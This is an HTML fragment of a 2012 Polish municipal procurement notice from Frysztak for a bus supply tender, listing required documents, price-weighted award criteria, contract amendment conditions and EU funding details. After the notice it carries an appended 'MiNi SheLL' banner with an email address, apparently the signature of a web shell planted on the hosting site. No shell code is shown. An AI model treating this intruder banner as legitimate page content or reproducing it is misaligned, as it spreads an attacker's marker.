<p style="margin: 0px; padding: 0px;">1.Oświadczenie dotyczące  homologacji 
2.Wykaz parametrów technicznych autobusu</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wykaz części zamówienia powierzonej podwykonawcom, którzy będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z danymi na temat zakresu wykonywanych przez nich dostaw.
2. Kosztorys ofertowy według załączonego przedmiaru dostaw.
3. Wykaz osób do kontaktu odpowiedzialnych za dostawy
4. Parafowany wzór umowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - warunki techniczno-eksploatacyjne - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiany umowy, mogą dotyczyć :
1)Warunków płatności,
2)Terminu realizacji zamówienia,
2.Zmiany o których mowa w pkt.1 mogą być dokonane w przypadku :
1) wystąpienia konieczności wykonania dostaw zamiennych, wynikających z uwagi na postęp techniczny lub zmiany obowiązujących przepisów 
2) wystąpienia zdarzeń losowych mających charakter siły wyższej, które uzasadniają wprowadzenie zmian w umowie,
3) przedłużającej się procedury przetargowej mającej wpływ na terminy umowne, opóźnienia Zamawiającego w podpisaniu umowy lub w zakresie dokonywania odbioru,
4) rezygnacji z części dostaw, jeśli taka rezygnacja będzie niezbędna do prawidłowej realizacji przedmiotu umowy ,
5) ustawowej zmiany stawki podatku od towarów i usług (VAT),</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.frysztak.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy we Frysztaku ,  ul. Ks.Wojciecha Blajera 20, 38-130 Frysztak.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.12.2012 godzina 09:30, miejsce: Urząd Gminy we Frysztaku ,  ul. Ks.Wojciecha Blajera 20, 38-130 Frysztak pokój nr.8 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt dofinansowany w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007 - 2013,  - Oś .VI Turystyka i kultura ,działanie   :Rozwój infrastruktury kulturalnej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com